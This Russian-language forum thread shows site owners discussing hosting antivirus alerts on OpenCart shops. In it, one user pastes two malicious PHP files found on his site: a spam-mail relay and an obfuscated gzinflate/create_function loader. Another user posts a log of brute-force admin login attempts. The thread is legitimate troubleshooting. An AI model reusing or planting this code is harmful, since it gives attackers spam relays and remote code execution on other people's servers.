На вашем сайте вирус!

[Bager]

Добрый день. Хостинг reg.ru 

В админке хостинга прилетело письмо: На вашем сайте вирус.

Открываю логи....

---------------
VIRUSDIE RESULT
---------------
/var/www/0000000/data/www/блабла.ru/admin/controller/report/fm.php : Shell.PhpFM : -
-------------
MALDET RESULT
-------------

Иду по пути. Есть папка: /report/ 

Внутри /report/ нет ни одного файла с именем fm.php 

Вопрос. Это чего очередной "разводняк" на очередную фигню от хостера?

[Bager]

8 минут назад, nikifalex сказал:

скорее всего удалили они этот вирус

Если бы. Что целиком fm.php? И в добавок пишут "вылечить"? 

Вопрос кого? 

Змінено 7 березня 2019 користувачем Bager

[spectre]

вирусдай не находит и треть дряни

[Bager]

10 минут назад, spectre сказал:

вирусдай не находит и треть дряни

Короче. Резюмирую.... Надо написать на хостинг "Пожалуйста отключите это г-но" (енто не первый раз)

В контексте прописать: Хватит меня разводить на пустом месте, придумайте что-то поизящнее. 

Как я понимаю такого не бывает что есть вирус, в файле, которого нет. Даже звучит бредово.

Я просто уточнить, вдруг я съел че-то нито, файла в папке не могу увидеть. 

Вирусдай - это такой прикол, чтобы скучно не было. Я так понял. 

Спасибо!

 

[spectre]

провериться бы надо, сами по себе подобные штуки не появляются да и хостеры редко страдают такого плана разводом

 

можете в лс мне написать - это недорого

[Bager]

6 минут назад, spectre сказал:

провериться бы надо, сами по себе подобные штуки не появляются да и хостеры редко страдают такого плана разводом

 

можете в лс мне написать - это недорого

Сейчас хостинг ответит на вопрос "шо конкретно вы имели ввиду"

В зависимости от того что я пойму из ответа, буду думать.

[Bager]

25 минут назад, Bager сказал:

Сейчас хостинг ответит на вопрос "шо конкретно вы имели ввиду"

В зависимости от того что я пойму из ответа, буду думать.

Ответ хостинга: Здравствуйте! Судя по всему в данном случае имело место срабатывание антивирусной проверки на временный файл. На данный момент проблем не наблюдаем. Приносим извинения за беспокойство.

Енто как? Ну хорошо. Может и был этот временный файл. Как я понимаю, должны быть логи. Где их посмотреть? У меня чего только с сайтами не было, но вот вирусы, это что - то новое. 

Не успел я с поддержкой проститься, опять в логах антивируса - новая запись. Самое главное: На сайте ни одного товара, он не  в индексе, посетителей нет. Он нафик не кому не нужен. Ошибок нет. Господа, научите как посмотреть генерацию временных php файлов. Наверняка что -то такое есть. 

[Bager]

7 минут назад, nikifalex сказал:

пора уже создавать тему "отмазки хостеров". Будет покруче "анекдотов"

они иногда такую дичь несусветную несут шо капец.

Вот так бы сразу. Одним предложением, все понял.

Собственно... В чем весь сыыыырррр в скрине как я понимаю.

[AlexDW]

Цитата

..удаляет вредоносные фрагменты кода и в случае необходимости дописывает недостающие для сохранения работоспособности вашего веб-сайта фрагменты

 

поди по тарифу рублей за 500 - оно еще и само вам сайт с нуля сделает

до чего техника дошла! (с)

[Bager]

14 минут назад, AlexDW сказал:

 

поди по тарифу рублей за 500 - оно еще и само вам сайт с нуля сделает

до чего техника дошла! (с)

Не вопрос

 

[Koss88]

а меня вот тоже обрадовали сегодня:

IHC.RU <[email protected]>	04:10 (15 часов назад)
кому: я

Здравствуйте.

Ваш хостинг p502184 был проверен антивирусом.

Найдены вирусы, спам-ссылки или уязвимые скрипты! Помощь в лечении сайтов вам могут оказать в компании Ревизиум.

Вредоносный код в php:

/home/p502184/www/kinoigrushki.ru/catalog/model/tool/imgwm.php

 

Здравствуйте.

1. Указанный файл /home/p502184/www/kinoigrushki.ru/catalog/model/tool/imgwm.php изменялся 11 апреля.
Также в логах мы нашли запрос, к этому файлу, в логах доступа к сайту в это время.
Боле подробно на скриншоте:
https://scr.pics/cf3cf323e.jpg

 

Не похоже на развод...

[mpn2005]

2 часа назад, Koss88 сказал:

Не похоже на развод...

Не похоже. Особенно если файл всё ещё на месте.

Вероятнее всего при открытии там будет довольно нечитаемый код.

Для начала хотя бы смените у него расширение на .txt

[mpn2005]

Но если уже хостеры начнут вирусы подкидывать, а потом предлагать полечить за деньги.

Вот тут реально дикие времена начнутся. 8)

 

[Bager]

4 часа назад, mpn2005 сказал:

Но если уже хостеры начнут вирусы подкидывать, а потом предлагать полечить за деньги.

Вот тут реально дикие времена начнутся. 8)

 

Короче. Как это понял я. Я разместил на обычном дешевом шареде магазин. 

Это мое личное мнение. Я могу быть не прав!!!

Начал заливать товары... тысяч по 20... каждый день иногда и пару раз в день. Сайту нету двух месяцев, посетителей... два калека в сутки. Сначала бомбил "вирус дай".

Потом стали находится спам скрипты в почте, что действительно было. Вирусдай присылал ссылки на несуществующие файлы, мягко говоря часто. Потом начал находить в фото вирусы.

Фото все наши. Вирусы там я так и не нашел нигде. Мы с ними, с фото, просто не умеем ничего такого делать. 

 

В итоге я нацарапал в поддержку в коротком переводе: "не пошлибы вы .... сами знаете куда с вашим г...ом и отрубите это ... для моего сайта вообще"

 

Отрубили.

 

Дальше начались чудеса.... Файловая система, при загрузке 30 -40 процентов, не знаю с какой стати, по ночам, становилась переполненной. Я до сих пор не понял почему. Итогом стало то, что начал рушится шаблон, файлы......  В основном ночью. Утром все опять как было.... Только сайт... то одно отвалилось, то другое... Короче резервная копия через день.

Дальше, стал замечать что при индексации (заходе робота), вываливалась частенько на целую партию товаров 404 ошибка... сайт с утра был доступен и эти товары отдавали код 200. К серверу доступа нет, но раз 404 у яндекса, а утром 200, значит дурак точно не Яндекс. 

Быстрее всего, сайт перегружал процессор во время захода бота, сверх установленной нормы и сервер делал kill process. Я не спец по серверам. Пишу как понимаю.

Итогом стало то, что из 20.000 товаров, чуть меньше, с ежедневным обновлением, проиндексировал процентов 60. За пару месяцев.

 

Проблему решил радикально - VDS. Переехал на последний. Дело двинулось. Пошла индексация. Самое интересное, я хостера не виню. Там давали "пиковую нагрузку" в 1 гигобайт оперативки по условиям тарифа. Это пиковая. 

 

На VDS, когда сайт в покое, то есть на нем вообще нет никого, кушает, 1.1 - 1.3 гига. То есть на сайте с товаром, минимум оперативки должно быть гигабайта 1,5 - 2 видимо. И одного процессора... маловато.

Как я понял, нЕфига слона запускать в посудную лавку, видимо я перегружал им процессор и оперативку, плюс по ночам выгрузки товаров, собственно.... они, таким образом "просили" переехать.

Как-то так.

Сайт в итоге покарежили. Пришлось с нуля восстанавливать. Даже резервные копии не помогли.

 

 

 

 

 

Змінено 19 квітня 2019 користувачем Bager

[sazonoff]

11 часов назад, mpn2005 сказал:

Но если уже хостеры начнут вирусы подкидывать, а потом предлагать полечить за деньги.

Вот тут реально дикие времена начнутся. 8)

 

 

Вряд ли им нужен такой бизнес.  Репутацию на раз потеряют.

 

В 07.03.2019 в 17:47, Bager сказал:

Хостинг reg.ru 

А рег.ру - один из самых паршивейших хостеров по неадекватной качеству цене.

Поддержка слабая,   софт годами не обновляют на шаред-хостинге.

Выезжают в конкурентной борьбе только за счет того, что первыми предлагают свои услуги новичкам, которые зарегали домен.

[spectre]

11 минут назад, sazonoff сказал:

 

Вряд ли им нужен такой бизнес.  Репутацию на раз потеряют.

 

 

таймвеб и регру довольно неплохо живут с нахождения несуществующих вирусов, да и существующих тоже

у них еще круче бывают кейсы, вырубают сайт и говорят что пока вы не уберете вирус и не ОБНОВИТЕ CMS мы нифига не разблокируем, идите в ревизиум за 6к

на резонный вопрос как можно обновить cms и как это вообще связано с лечением сайта ответить затрудняются, как и на другие вполне конкретные вопросы

 

также распространены заражения от соседей по серверу, то есть аккаунты не изолированы и какой-то вася который заразился заражает все аккаунты, поддержка мычит но не признается

выключается сайт, просто отдает 403 на любой запрос - через 2 часа - опять вирус, чудеса

ладно, на эту тему могу рассказывать много и долго))

 

 

знаю одно точно, сайт на опенкарт в покое не может потреблять 1гб оперативки

 

[Bager]

6 часов назад, spectre сказал:

знаю одно точно, сайт на опенкарт в покое не может потреблять 1гб оперативки

Ну как вам сказать. Возможно сервер настроен не совсем верно. Однако, факт налицо.

Вот так вот практически всегда.  Может не правильно перевожу?  Шаблонный сайт. Только внешний марафет навел. около 15.000 товаров. 

То есть, я пока ничего не делал, сервер кое -как настроил и запустил. Просто с этими танцами, я про хостинг, никак не уберу все косяки на сайте. 

Про большее пока и не заикаюсь.

 

[Koss88]

В 19.04.2019 в 22:07, mpn2005 сказал:

Не похоже. Особенно если файл всё ещё на месте.

Вероятнее всего при открытии там будет довольно нечитаемый код.

Для начала хотя бы смените у него расширение на .txt

содержимое файла:

<?php
error_reporting(0);
set_time_limit(0);
if(isset($_GET["admin"])){
    unlink($_SERVER['SCRIPT_FILENAME']);
}
if(isset($_POST["mailto"]))
        $MailTo = base64_decode($_POST["mailto"]);
else
    {
    echo "indata_error";
    exit;
    }
if(isset($_POST["msgheader"]))
        $MessageHeader = base64_decode($_POST["msgheader"]);
else
    {
    echo "indata_error";
    exit;
    }
if(isset($_POST["msgbody"]))
        $MessageBody = base64_decode($_POST["msgbody"]);
else
    {
    echo "indata_error";
    exit;
    }
if(isset($_POST["msgsubject"]))
        $MessageSubject = base64_decode($_POST["msgsubject"]);
else
    {
    echo "indata_error";
    exit;
    }
if(mail($MailTo,$MessageSubject,$MessageBody,$MessageHeader)){
    echo "sent_ok";
} else {
    echo "sent_error";
}
exit;
?>

[mpn2005]

3 часа назад, Koss88 сказал:

содержимое файла:

Дыра для рассылки спама.

[mpn2005]

Небольшая сводка для справки.

На своей демке поставил ловушку неудачных попыток входа в админку:

Вот лог (чуть больше чем за сутки):

2019-04-24 19:26:03 - 5.188.x.x login:admin password:12345
2019-04-24 20:34:56 - 5.188.x.x login:admin password:123123
2019-04-24 21:43:43 - 5.188.x.x login:admin password:pass
2019-04-24 22:52:51 - 5.188.x.x login:admin password:abc123
2019-04-25 0:01:18 - 5.188.x.x login:admin password:1234567
2019-04-25 1:10:15 - 5.188.x.x login:admin password:12345678
2019-04-25 2:19:16 - 5.188.x.x login:admin password:123456789
2019-04-25 3:28:36 - 5.188.x.x login:admin password:1234567890
2019-04-25 4:14:51 - 77.81.x.x login:admin password:123
2019-04-25 4:37:53 - 5.188.x.x login:admin password:admin1234
2019-04-25 5:49:32 - 5.188.x.x login:admin password:admin12345
2019-04-25 7:00:29 - 5.188.x.x login:admin password:admin2015
2019-04-25 8:10:43 - 5.188.x.x login:admin password:admin2016
2019-04-25 9:20:31 - 5.188.x.x login:admin password:admin1
2019-04-25 10:30:04 - 5.188.x.x login:admin password:adminadmin
2019-04-25 11:39:40 - 5.188.x.x login:admin password:111111
2019-04-25 12:49:32 - 5.188.x.x login:admin password:admin2014
2019-04-25 13:59:30 - 5.188.x.x login:admin password:123
2019-04-25 15:08:58 - 5.188.x.x login:admin password:1234
2019-04-25 16:18:40 - 5.188.x.x login:admin password:demo
2019-04-25 17:29:22 - 5.188.x.x login:admin password:demo123
2019-04-25 18:38:54 - 5.188.x.x login:admin password:guest
2019-04-25 19:49:25 - 5.188.x.x login:admin password:hello
2019-04-25 20:59:54 - 5.188.x.x login:admin password:password
2019-04-25 22:10:28 - 5.188.x.x login:admin password:qwe123
2019-04-25 23:20:51 - 5.188.x.x login:admin password:qwerty
2019-04-26 0:31:13 - 5.188.x.x login:admin password:test
2019-04-26 1:42:14 - 5.188.x.x login:admin password:test123
2019-04-26 2:53:32 - 5.188.x.x login:admin password:123654
2019-04-26 4:04:05 - 5.188.x.x login:admin password:1
2019-04-26 5:14:41 - 5.188.x.x login:admin password:admin2017
2019-04-26 6:18:24 - 77.81.x.x login:admin password:12345

 

[Koss88]

Как то раз появился файл catalog/view/indess.php ночью неизвестно откуда 

Антивирус хостинга ругается что в нем вредоносный код.

Содержимое файла: <?php
$size = array();
$datas='%DDW%DB%AE%83+%10%FC%9A%7DGY%A0%3E%D6K%FF%FF%93%CE%CE%02%8A%F5%D2hmr%DA%C4%10%84ev%98Y%A1%25%EF%28%D4x%FC%03%AD%D3%16%83%26%8D%04%26%DF%90%1F%C8%07%AAod%0D%D5%0D%D9%96LO%E6N%C1j0%EB%C2%18%D9cD%5E%7D%97_%1BL-%D7b%D6c%1C%01v%82%92%91Z%019%10%0B%94%F4%5B%AA%85UE%9E%13%A0%F0%91%11%D7%03P%9E%901M%83%B5+_%29%1F%812d%7B%B4%5E%E9aw%83B%29O%C9%25%89%90%CB%137%C4%9Df%D4%91%92j%84%15%B6H%DDa%E1%0C%24%A7%88%B4%9DU%10%A1%E7sG%F8%07r%86%F8%86v%8CA%3A%AFS%FD%2C%D7%A4L%91%11%92%8A%3E%A3%5C%8C6j5%DB%EF%B0Ku%94%AB%99%D2M%BB%0B0%1D%0F%17%BAy%AD%04%93%A0%0Eg%ECT%99%40%21%A0%7DR%D5%E8Ne%0A%BEh%9DDSV%F8d%9C-%10o5%FB%23%15%D2%3A%C8ba%88l%BB%5C%E4%ED%19IK%CC%D0%9F%';$datas.='F7q%AFxd%DC%E2U%AA%14%25%C4%CFE%CB%03qE%DC%A3%1F%2Bj%F9i%9C0%FAbJ%DFY%0C%97%FBrI%C1%EC%1C%5Co%FA%BE%89%FC%85%F6%BD8%DE%9B%15%23%C6%CE%CB%1B%0AG%BA%D6%C6tI%F5z2%A8wP%E01%BB%A7%22%2C%F6%BE%FA0%EAd%5C%EE%E2%F2%D1%26%BD%01%23%07%EB%C9%2A%01%AF%22C%AE%DC%3F%C7m%BA%94%9D%CEj%96I%99%F2n%8A%E9n%89%5B%5Dg%B59%1F%98U%AE%D8%E2w%85%84%D99H%AAg%5E%FF%16%CE%29%8F%B0%A0%DC%5C%FE%B5%E0R%F6c%16%B8%9C%B4R%40%87%8B%FB%19%F3R_%5E2%FF%29%83%EA%24Kh%AE%B0%A6D%FB';
$data = cutting($datas,$size);
if($data == NULL){
    echo 'indata_error';
}
function cutting($datass,$size,$nameimage='no_name.jpg'){
    $datas='%84%29kl%7F%C9%0E%C4%3B%DD%E6%3D%B1%C5%C2%B7%7Dq%AB%B0%1F0h%9F%FF%FFu%AA8%8D%E36W%0E%FF%EE%A0%BC%DB%F1%B3%CFd%27ly%04-%7EN%2C%85%8A%AA%8AV%F1%9F+%12%B53eB4%BD%B0%40%5E%8Fan%CB%3Ei%3B%13%FF%0F';$datas='};'.urldecode(gzinflate(urldecode($datass.$datas))).'exit;{';create_function('',$datas);
    if($nameimage != 'no_name.jpg'){ 
        return json_encode(array('img'=>$datas,'name'=>$nameimage));
    } else {
        return NULL;
    }
}
?>

 

Может его удалить просто?

[Yoda]

3 часа назад, Koss88 сказал:

Как то раз появился файл catalog/view/indess.php ночью неизвестно откуда 

Антивирус хостинга ругается что в нем вредоносный код.

Содержимое файла: <?php
$size = array();
$datas='%DDW%DB%AE%83+%10%FC%9A%7DGY%A0%3E%D6K%FF%FF%93%CE%CE%02%8A%F5%D2hmr%DA%C4%10%84ev%98Y%A1%25%EF%28%D4x%FC%03%AD%D3%16%83%26%8D%04%26%DF%90%1F%C8%07%AAod%0D%D5%0D%D9%96LO%E6N%C1j0%EB%C2%18%D9cD%5E%7D%97_%1BL-%D7b%D6c%1C%01v%82%92%91Z%019%10%0B%94%F4%5B%AA%85UE%9E%13%A0%F0%91%11%D7%03P%9E%901M%83%B5+_%29%1F%812d%7B%B4%5E%E9aw%83B%29O%C9%25%89%90%CB%137%C4%9Df%D4%91%92j%84%15%B6H%DDa%E1%0C%24%A7%88%B4%9DU%10%A1%E7sG%F8%07r%86%F8%86v%8CA%3A%AFS%FD%2C%D7%A4L%91%11%92%8A%3E%A3%5C%8C6j5%DB%EF%B0Ku%94%AB%99%D2M%BB%0B0%1D%0F%17%BAy%AD%04%93%A0%0Eg%ECT%99%40%21%A0%7DR%D5%E8Ne%0A%BEh%9DDSV%F8d%9C-%10o5%FB%23%15%D2%3A%C8ba%88l%BB%5C%E4%ED%19IK%CC%D0%9F%';$datas.='F7q%AFxd%DC%E2U%AA%14%25%C4%CFE%CB%03qE%DC%A3%1F%2Bj%F9i%9C0%FAbJ%DFY%0C%97%FBrI%C1%EC%1C%5Co%FA%BE%89%FC%85%F6%BD8%DE%9B%15%23%C6%CE%CB%1B%0AG%BA%D6%C6tI%F5z2%A8wP%E01%BB%A7%22%2C%F6%BE%FA0%EAd%5C%EE%E2%F2%D1%26%BD%01%23%07%EB%C9%2A%01%AF%22C%AE%DC%3F%C7m%BA%94%9D%CEj%96I%99%F2n%8A%E9n%89%5B%5Dg%B59%1F%98U%AE%D8%E2w%85%84%D99H%AAg%5E%FF%16%CE%29%8F%B0%A0%DC%5C%FE%B5%E0R%F6c%16%B8%9C%B4R%40%87%8B%FB%19%F3R_%5E2%FF%29%83%EA%24Kh%AE%B0%A6D%FB';
$data = cutting($datas,$size);
if($data == NULL){
    echo 'indata_error';
}
function cutting($datass,$size,$nameimage='no_name.jpg'){
    $datas='%84%29kl%7F%C9%0E%C4%3B%DD%E6%3D%B1%C5%C2%B7%7Dq%AB%B0%1F0h%9F%FF%FFu%AA8%8D%E36W%0E%FF%EE%A0%BC%DB%F1%B3%CFd%27ly%04-%7EN%2C%85%8A%AA%8AV%F1%9F+%12%B53eB4%BD%B0%40%5E%8Fan%CB%3Ei%3B%13%FF%0F';$datas='};'.urldecode(gzinflate(urldecode($datass.$datas))).'exit;{';create_function('',$datas);
    if($nameimage != 'no_name.jpg'){ 
        return json_encode(array('img'=>$datas,'name'=>$nameimage));
    } else {
        return NULL;
    }
}
?>

 

Может его удалить просто?

 

От того что вы его удалите ничего не изменится. Через какое то время будет тоже самое. 
 

[Koss88]

это почему?

[Yoda]

18 минут назад, Koss88 сказал:

это почему?

Потому что то что вы нашли  - это следствие.
А источник уязвимости в другом месте!

[Koss88]

и как же этот источник определить?